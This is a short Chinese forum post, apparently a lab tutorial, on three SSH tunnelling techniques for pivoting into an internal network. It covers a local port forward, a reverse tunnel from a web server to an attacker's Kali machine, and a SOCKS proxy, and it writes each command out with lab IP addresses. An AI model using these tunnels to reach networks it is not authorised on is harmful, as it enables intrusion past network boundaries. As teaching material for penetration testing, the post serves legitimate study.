电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 675 人浏览分享

内网隧道技术中ssh的常见的三种用法

[复制链接]
675 0
SSH隧道靶场搭建

靶场拓扑图:

QQ截图20211220151353.png

ssh连接方式

正向连接

WEB服务器执行

7777端口映射到192.168.183.131:80

ssh -CNfL 0.0.0.0:7777:192.168.183.131:80 root@127.0.0.1

QQ截图20211220151457.png

备注:
root@127.0.0.1 是web服务器上的用户,
映射完成。
攻击者浏览器访问
curl http://192.168.91.125:7777/1.html
访问的是内网中的192.168.183.131:80

198.png

关闭正向连接:
netstat -antup |grep 7777
得到pid
kill -9 pid

反向连接

ssh -qTfnN -R port:host:hostport remote_ip

在web服务器上做反向连接,

在kali上开启2222端口,将2222端口的数据转发到web服务器上的22端口。

ssh -qTfnN -R 2222:127.0.0.1:22  root@192.168.91.170

kali中输入

ssh -p 2222 root@127.0.0.1

可以连入了web服务器上

QQ截图20211220151709.png

curl http://192.168.183.131/1.html

196.png

ssh sockets代理

ssh -CfNg -D port remotehost

web服务器上

ssh -CfNg -D 7000 root@192.168.91.125

root@192.168.91.125 web服务器

6.png

在kali的浏览器上开启代理

9.png

结果:

2.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.